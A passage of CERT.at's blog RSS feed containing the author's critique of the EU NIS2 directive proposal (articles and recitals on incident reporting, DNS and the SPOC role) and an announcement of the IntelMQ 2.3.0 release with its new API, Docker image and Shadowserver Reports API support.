&lt;p class=&quot;block&quot;&gt;The definition is good, but it's not a good fit here, because it covers generic threats as well. Any competent CISO will always have a long list of threats to the information security of his organisation. Such a list is the basis for risk management and thus essential for steering defensive measures towards optimal results. It's not something that need to be shared to CSIRTs, competent authorities or recipients of services.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;What we need here is a different definition. It must be restricted to a concrete event that actually happened. The only thing that can stay in the conjunctive (&quot;might&quot;) is the connex to an actual outage. In other words, the risk that someone might have compromised the integrity of an organisation's network is not worth being reported, but the risk that someone from whom you know is inside your networks will cause a disruption, is.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Additionally, we need to make sure that not every entity will need to do a risk disclosure every time a software vendor releases a patch. (Yes, every second Tuesday each month, almost all entities learn about very concrete risks to their infrastructure. Worth reporting? No.)&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 20 (6)&lt;/strong&gt; [...] the competent authority or the CSIRT shall inform the other affected Member States [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a step in the right direction, though I'd prefer that to be either CyCLONe officer or CSIRT.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 20 (6,8,9)&lt;/strong&gt; [...] single point of contact [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Please remove the SPOC from this operational role. As for 9.: the SPOC does not have (according to this document) the information on all NIS incident reporting, only the cross-MS relevant ones.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 23(1)&lt;/strong&gt; For the purpose of contributing to the security, stability and resilience of the DNS, Member States shall ensure that TLD registries and the entities providing domain name registration services for the TLD shall collect and maintain accurate and complete domain name registration data in a dedicated database facility with due diligence subject to Union data protection law as regards data which are personal data.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is utterly misleading. Someone is pushing an agenda which has little to do with the purpose of the NIS directive. Last year I was asked by ENISA staff for my input to a report on the security of the DNS and the questions made it clear that the initiator of that study wanted ENSIA to come to the pre-ordained conclusion that incorrect domain ownership data is the most pressing security issue for the DNS.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;No, it is not.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;So here we go again. The security, stability and resilience of the DNS depends on the following players:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The domain owner (registrant). If they lose the credentials for the web-interface of their registrars, then the domain can be compromised.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The registrar. They act in the name of the registrant, and if they mess up, something might happen to the domain that does not conform to the wishes of the domain owner.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The registry (and the nameserver operators it contracts). Making sure the correct registration data is kept and made available to recursive nameservers&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The recursive nameservers: run by either ISPs or corporate networks&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The domains of important or essential entities do not depend on whether the registration data for some other domain is correct or not.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This does not mean that accurate and complete registration data would not be helpful in a broader context. Depriving malicious actors a way to register domains under fake names could have positive effects with regards to the level of fraud on the Internet and might improve the overall cyber hygiene.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;But the stability of the DNS itself? It just does not matter. Looking at the history of disruptions in DNS operations shows that incorrect whois data was almost never a factor.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 23&lt;/strong&gt; [...] TLD [...]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;In the current NIS regime, TLD registries are explicitly mentioned as operators of essential services. I agree with that classification as any disruption at that level has significant impact. But this here is different: we're aiming at the problem that someone might be using a domain without disclosing who he is. Whether that domain is directly under a TLD (e.g., example.at) or one layer down (example.co.at) is completely irrelevant. If you look at the &lt;a href=&quot;https://publicsuffix.org/&quot;&gt;public suffix list&lt;/a&gt;, there are many points in the DNS where delegations happen to other organisations. &lt;strong&gt;If the point of Article 23 is to prevent the access to domain names without accurate ownership tracking, then the focus on TLDs is just way to narrow.&lt;/strong&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;What TLD registries are covered?&lt;/strong&gt; Should these just be the ccTLDs of EU Member states plus .eu? Or should this (similar to the GDPR) cover all registries that cater to the EU market? Is this Article supposed to cover .org and also most of the ngTLDs? It looks like it. See also Art. 24(3).&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Thick versus Thin registries:&lt;/strong&gt; There are two basic approaches to keeping track of registrant data: Thick registries hold a database with registrant data, thin registries leave this job to the registrars and store only the nameserver and a registrar-ID. Is article supposed to outlaw thin registries in the EU? What does this mean for .com?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 23&lt;/strong&gt; (summary)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Summary: I can see a point in making sure that domain registration data is correct. But the way this topic is approached here is not thought through and there is a lot to say that the NIS directive is probably the wrong instrument.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 26&lt;/strong&gt; Cybersecurity information-sharing arrangements&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This looks fine.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;&lt;strong&gt;Art. 27&lt;/strong&gt; Voluntary notification of relevant information&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This should be a bit more generic. This article needs also to cover:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;non-covered entities reporting incidents and vulnerabilities / risks on their side&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;anybody reporting incidents / vulnerabilities / risks detected anywhere else.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Why is that important? We used to get a data-feed from Google covering issues with web-pages their crawler detected in the Austrian Internet. They stopped providing this, claiming problems with the GDPR. It would be really helpful if security researchers have a clear green light to report their findings to the national CSIRTs.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Wed, 10 Mar 2021 11:03:51 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/3/nis2-proposal-first-feedback-on-the-normative-text</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-03-10T11:03:51Z</dc:date></item><item><title>IntelMQ 2.3.0 with IntelMQ API, Docker, Shadowserver Reports API support, new documentation home and more</title><link>https://www.cert.at/en/blog/2021/3/intelmq-230-api-docker-shadowserver-reports-api-documentation</link><description>&lt;p class=&quot;block&quot;&gt;Today we released the newest IntelMQ version 2.3.0 along with its companion tools - the IntelMQ Manager and the new IntelMQ API.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This version comes with significant changes, being an important intermediate step for the 3.0 release scheduled for summer 2021.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We moved the documentation to &lt;a title=&quot;intelmq.readthedocs.io&quot; href=&quot;https://intelmq.readthedocs.io/&quot;&gt;a new home&lt;/a&gt;, see our previous blog post &lt;a href=&quot;https://www.cert.at/en/news/blog/intelmq-tutorial-and-new-documentation-page&quot;&gt;&quot;IntelMQ offers tutorial lessons and a new documentation page&quot;&lt;/a&gt;. The new documentation page also integrates the documentation for the Manager and API, ending the times of distributed documentation. It further features overviews of the integration possibilities &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/n6-integrations.html&quot;&gt;with n6&lt;/a&gt; and &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/MISP-Integrations.html&quot;&gt;MISP&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Using a combination of Vagrant and Ansible, end-to-end tests enhance our quality management, which now consists of extensive unit-tests, packaging tests, spelling &amp;amp; styling check and as well as security analyses.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Numerous &quot;bots&quot; (IntelMQ's plug-able components) have been added or gained new significant features:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/feeds.html#cz-nic&quot;&gt;CZ.nic HAAS and PROKI Parsers&lt;/a&gt;, by &lt;a href=&quot;https://github.com/gethvi/&quot;&gt;Filip Pokorn&amp;yacute;&lt;/a&gt; and &lt;a href=&quot;https://github.com/e3rd/&quot;&gt;Edvard Rejthar&lt;/a&gt; (CSIRT.CZ)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/feeds.html#eset&quot;&gt;ESET Collector and Parser&lt;/a&gt;, by &lt;a href=&quot;https://github.com/monoidic&quot;&gt;Mikk Margus M&amp;ouml;ll&lt;/a&gt; (CERT.EE)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#kafka&quot;&gt;Kafka Collector&lt;/a&gt;, by &lt;a href=&quot;https://github.com/schacht-certat/&quot;&gt;Birger Schacht&lt;/a&gt; (CERT.at)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#key-value-parser&quot;&gt;Key-Value Parser&lt;/a&gt;, by &lt;a href=&quot;https://github.com/creideiki/&quot;&gt;Karl-Johan Karlsson&lt;/a&gt; (Link&amp;ouml;ping University)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/bots.html#id25&quot;&gt;Request Tracker Output&lt;/a&gt;, by &lt;a href=&quot;https://github.com/MariusUrkis&quot;&gt;Marius Urkis&lt;/a&gt; (NRDCS.LT)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/feeds.html#via-api&quot;&gt;Shadowserver&lt;/a&gt; &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver-reports-api&quot;&gt;Reports API&lt;/a&gt; and &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver&quot;&gt;JSON Parser&lt;/a&gt;, by &lt;a href=&quot;https://github.com/schacht-certat/&quot;&gt;Birger Schacht&lt;/a&gt; (CERT.at)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#splunk-saved-search&quot;&gt;Splunk Saved Search Expert&lt;/a&gt;, by &lt;a href=&quot;https://github.com/creideiki/&quot;&gt;Karl-Johan Karlsson&lt;/a&gt; (Link&amp;ouml;ping University)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#threshold&quot;&gt;Threshold Expert&lt;/a&gt;, by &lt;a href=&quot;https://github.com/creideiki/&quot;&gt;Karl-Johan Karlsson&lt;/a&gt; (Link&amp;ouml;ping University)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver&quot;&gt;Shadowserver CSV &amp;amp; JSON Parser&lt;/a&gt;: Support for the feeds MSRDPUDP, Vulnerable-HTTP, Sinkhole DNS and fixes for existing feed mappings, by &lt;a href=&quot;https://github.com/waldbauer-certat/&quot;&gt;Sebastian Waldbauer&lt;/a&gt; and &lt;a href=&quot;https://github.com/wagner-certat/&quot;&gt;Sebastian Wagner&lt;/a&gt; (CERT.at)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#generic-url-fetcher&quot;&gt;HTTP collector&lt;/a&gt;: PGP signature check functionality, by &lt;a href=&quot;https://github.com/sinus-x&quot;&gt;sinus-x&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Several Experts (&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#asn-lookup&quot;&gt;1&lt;/a&gt;, &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#maxmind-geoip&quot;&gt;2&lt;/a&gt;, &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#recordedfuture-ip-risk&quot;&gt;3&lt;/a&gt;, &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#tor-nodes&quot;&gt;4&lt;/a&gt;): Integrated local database update mechanisms, by &lt;a href=&quot;https://github.com/gethvi/&quot;&gt;Filip Pokorn&amp;yacute;&lt;/a&gt; (CSIRT.CZ)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;All new changes can be read in the &lt;a href=&quot;https://github.com/certtools/intelmq/blob/2.3.0/CHANGELOG.md&quot;&gt;change log&lt;/a&gt;. If you are upgrading, please also have a look at the &lt;a href=&quot;https://github.com/certtools/intelmq/blob/2.3.0/NEWS.md&quot;&gt;news file&lt;/a&gt;. If you get started, have a look at &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/index.html&quot;&gt;our documentation&lt;/a&gt; which contains an introduction and detailed information on the installation.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;The new IntelMQ API and overhauled IntelMQ Manager back-end&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Version 2.3.0 comes with a new &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/intelmq-api.html&quot;&gt;API&lt;/a&gt;, a feature which has often been requested for IntelMQ. The API actually originates from the IntelMQ Manager:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Thanks to &lt;a href=&quot;https://sunet.se/&quot;&gt;SUNET&lt;/a&gt;-funding, the contributing company &lt;a href=&quot;https://intevation.de/index.en.html&quot;&gt;Intevation&lt;/a&gt; rewrote the back-end of the &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/intelmq-manager.html&quot;&gt;IntelMQ Manager&lt;/a&gt; in Python. Python is the main language used in the IntelMQ projects, but until the rewrite PHP was used for the backend. As part of the revamp, the URLs have been changed to better match those of a proper programming interface. Additionally, Intevation added optional authentication directly into the API.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;CERT.at then further split the IntelMQ Manager's back-end off into the IntelMQ API. Therefore it's now possible to run the Manager and the API on different hosts.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Docker&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;IntelMQ 2.3.0 is the first release with an official Docker image available at &lt;a href=&quot;https://hub.docker.com/r/certat/intelmq-full&quot;&gt;Dockerhub under certat/intelmq-full&lt;/a&gt;. Using Docker is the simplest way of getting started with IntelMQ as of now. But as it is brand-new, we consider it as beta currently.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The container consists of IntelMQ with all optional dependencies, including the Manager and the API, whereas Redis and nginx are ran in separate containers.&lt;br /&gt;Some configuration variables are passed to the containers using environment variables. This functionality is new in IntelMQ as well, but not yet available for all configuration settings. IntelMQ 3.0 will be able to use arbitrary parameters from the environment.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/installation.html&quot;&gt;installation instructions&lt;/a&gt; contain details about the set-up process.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Shadowserver Reports API&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.shadowserver.org/&quot;&gt;Shadowserver&lt;/a&gt; is an internationally active and altruistic organisation scanning the Internet for vulnerable devices every day and sinkholing various botnets. They provide the data free-of-charge to CERTs worldwide which are able to act upon the Threat Intelligence data. The vast amount of data is split into different &lt;em&gt;report types&lt;/em&gt;, whereas one report by report type is provided per day. A report only contains the data which is relevant for the recipient.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The traditional data transmission manner are e-mails with CSV data files, either directly as attachment or - if very big - linked for download via HTTPS. Since October 2020, Shadowserver also provides an &lt;a href=&quot;https://www.shadowserver.org/what-we-do/network-reporting/api-reports-query/&quot;&gt;HTTP API&lt;/a&gt;. IntelMQ supports this API as data collection since this version and allows all IntelMQ users (with an active Shadowserver cooperation) to get Shadowservers's reports directly and without detours into the processing pipeline. Aligned with IntelMQ's concept of separating data collection and parsing, IntelMQ has two separate components for the Shadowserver Reports API support:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The&amp;nbsp;&lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver-reports-api&quot;&gt;Shadowserver Reports API Collector&lt;/a&gt; needs to be configured with the API credentials, the relative time-frame and optionally a list of report types. If no list of report types is given, all available reports are downloaded. The collector keeps track which reports have already been downloaded, so the collector can be executed frequently without downloading data multiple times. The format of the downloaded data is JSON, as opposed to the data provided via e-mail, which is CSV.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#shadowserver&quot;&gt;Shadowserver JSON Parser&lt;/a&gt; uses the same field-mappings as CSV. But as opposed to the Shadowserver CSV parser, which maps the columns of CSV-files to IntelMQ's internal fields, the JSON parser does the same for JSON dictionaries. Both Shadowserver parsers are able to detect the report type based on the file name, which was recorded by the collector in the first place.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Shadowserver is actively looking for sponsors to keep up the great value they provide to the IT security community. Please consider &lt;a href=&quot;https://www.shadowserver.org/sponsor/&quot;&gt;becoming a sponsor&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 04 Mar 2021 15:21:14 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/3/intelmq-230-api-docker-shadowserver-reports-api-documentation</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-03-04T15:21:14Z</dc:date></item><item><title>A look at the NIS 2.0 Recitals</title><link>https://www.cert.at/en/blog/2021/1/nis2-recitals-feedback</link><description>&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/en/ip_20_2391&quot;&gt;EU commission dropped a large cyber security package&lt;/a&gt; on December 16th 2020, including a &lt;a href=&quot;https://ec.europa.eu/digital-single-market/en/news/proposal-directive-measures-high-common-level-cybersecurity-across-union&quot;&gt;first draft for a new version of the NIS Directive&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In front of the actual normative legal text, there are 84 &lt;a href=&quot;https://en.wikipedia.org/wiki/Recital_(law)&quot;&gt;recitals&lt;/a&gt;, describing the intents of the regulation. I&amp;rsquo;ve now read through them and this blogpost is &lt;strong&gt;my first reaction&lt;/strong&gt; (not the official position of CERT.at) to that proposal.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I haven't really looked at the normative text yet, feedback to that will come in another blogpost.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;ll quote some bits from the recitals of interest and comment on them.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;8&lt;/strong&gt;) Uniform size minimums for essential entities across the EU&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This might be suboptimal, as the importance of entities must be seen in relation to the size of the MS. (9) tries to mitigate this somewhat, but doesn&amp;rsquo;t define how small or micro entities from (9) need to be notified, too.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;12&lt;/strong&gt;) Sector-specific legislation and instruments can contribute to ensuring high levels of cybersecurity, while taking full account of the specificities and complexities of those sectors. [&amp;hellip;]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Under the current NIS framework in Austria, it is possible that sectors define their own national security baseline and have that approved by the competent authority. Continuity for such setups is essential.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;13&lt;/strong&gt;) bringing the finance sector into the NIS framework&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a positive development, and might stimulate the establishment of a national CSIRT for the financial sector.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;15&lt;/strong&gt;) Therefore, this Directive should apply to all providers of DNS services along the DNS resolution chain, including operators of root name servers, top-level-domain (TLD) name servers, authoritative name servers for domain names and recursive resolvers. &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is wrong on two counts:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;All &lt;/strong&gt;authoritative and recursive name servers is way too broad. Many people run recursive nameservers on the CPE connecting their home network to the Internet. Any server deployment might contain a recursive nameserver. My own private server runs the &lt;a href=&quot;https://nlnetlabs.nl/projects/unbound/about/&quot;&gt;unbound&lt;/a&gt; program for that purposes. On a typical Linux box, installing that service is a one-line command, and I guess that for Windows Server a single ticked checkbox might do the same. &lt;br /&gt;&lt;br /&gt;Your personal computer should not fall under the NIS directive just because of that. &lt;br /&gt;&lt;br /&gt;On the authoritative side, a good number of small enterprises, schools, associations, and private persons run their own authoritative name server. Again, this is really trivial to do. And this is one of the really good design points of the Internet: Running services is democratic, you don&amp;rsquo;t need to be a big organization to run your own DNS, Mail, or Webserver. &lt;br /&gt;&lt;br /&gt;Additionally, it is valuable for the resilience of the Internet as a whole that the DNS is run not only by a handfull of large players. The protocol supports redundant servers by design, it make a lot of sense to use those features.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The resolution chain is only one side of the DNS ecosystem. Equally important is the provisioning side, where domain owners ask registrars to create/change/delete delegation data at registries and provision resource records into their own zones. Over the last years, we&amp;rsquo;ve seen at least as many security issues on the provisioning side as on the resolution side.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I fully understand that important name-servers need to be covered by the NIS Directive. But there are many pretty irrelevant ones out there as well.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;22&lt;/strong&gt;) In order to facilitate cross-border cooperation and communication among authorities and to enable this Directive to be implemented effectively, it is necessary for each Member State to designate a national single point of contact responsible for coordinating issues related to the security of network and information systems and cross-border cooperation at Union level. &lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;23&lt;/strong&gt;) The single points of contact should be tasked with forwarding incident notifications to the single points of contact of other affected Member States.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The SPOC has always been the bastard child of the NIS directive. Its job description mixes policy issues &amp;ldquo;responsible for coordinating issues related to the security of network&amp;rdquo; with very operational jobs like &amp;ldquo;forwarding incident notifications&amp;rdquo;. Its implemention varies a lot between MS. There is no public directory of SPOC contact addresses (&lt;a href=&quot;http://ec.europa.eu/newsroom/dae/document.cfm?doc_id=53682&quot;&gt;this&lt;/a&gt; is a joke). There is no clear definition on response times and service levels.&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We have a cooperation mechanism on the technical layer: the CSIRTs Network.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We have a cooperation mechanism on the policy layer: the cooperation group.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We&amp;rsquo;re establishing a cooperation mechanism on the operational layer: the CyCLONe.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I think the problem arises as the incident reporting is neither uniformly to the CSIRTs (which would make sharing in the CNW ideal) or the NCAs (which are all part of the cooperation group). Thus they had to invent that virtual role of the SPOC to patch up the differences in the MSs&amp;rsquo; NIS implementations.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;With NIS 2.0, it is really time to fix this for good. My preferred solution is this:&amp;nbsp;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;As long as the reporting did not trigger a national alert, reports should only be shared via the CSIRTs Network&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;If there is any escalation based on the report (or if a significant cross-MS effect is possible), then the CyCLONe should be activated.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;All policy questions between MS should be handled by the cooperation group (or the HWP Cyber).&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Alternatively, the new consolidated reporting portals can implement cross-connects, making lateral passes between Member States a lot easier.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;So just kill the SPOC role. It only complicates things.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;(&lt;strong&gt;26&lt;/strong&gt;) Given the importance of international cooperation on cybersecurity, CSIRTs should be able to participate in international cooperation networks in addition to the CSIRTs network established by this Directive.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Yes. This is really needed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;28ff&lt;/strong&gt;) Since the exploitation of vulnerabilities in network and information systems may cause significant disruption and harm, swiftly identifying and remedying those vulnerabilities is an important factor in reducing cybersecurity risk. Entities that develop such systems should therefore establish appropriate procedures to handle vulnerabilities when they are discovered.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I fully support that we bring vulnerability disclosure into the NIS fold. There are a few points in the text where I see room of clarifications and improvements:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&amp;ldquo;products&amp;rdquo; vs. &amp;ldquo;services&amp;rdquo;. Here I have a flash-back to the GPL 2 to GPL 3 evolution: The GNU Public Licence used to be all about software and its properties once that software is changing hands. As the software you use started to run not only on your own computer, but might run on someone else&amp;rsquo;s server where you interact via some network client software (e.g., a Web-Browser), the legal framework covering open-source software had to change. &lt;br /&gt;&lt;br /&gt;It is thus necessary that the NIS-D also makes the transition. The use of the &amp;ldquo;product or service&amp;rdquo; language is appropriate and a step in the right direction. It shouldn&amp;rsquo;t be just &amp;ldquo;Entities that develop such systems &amp;hellip;&amp;rdquo;, but also &amp;ldquo;Entities that operate such systems &amp;hellip;&amp;rdquo;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&#13;
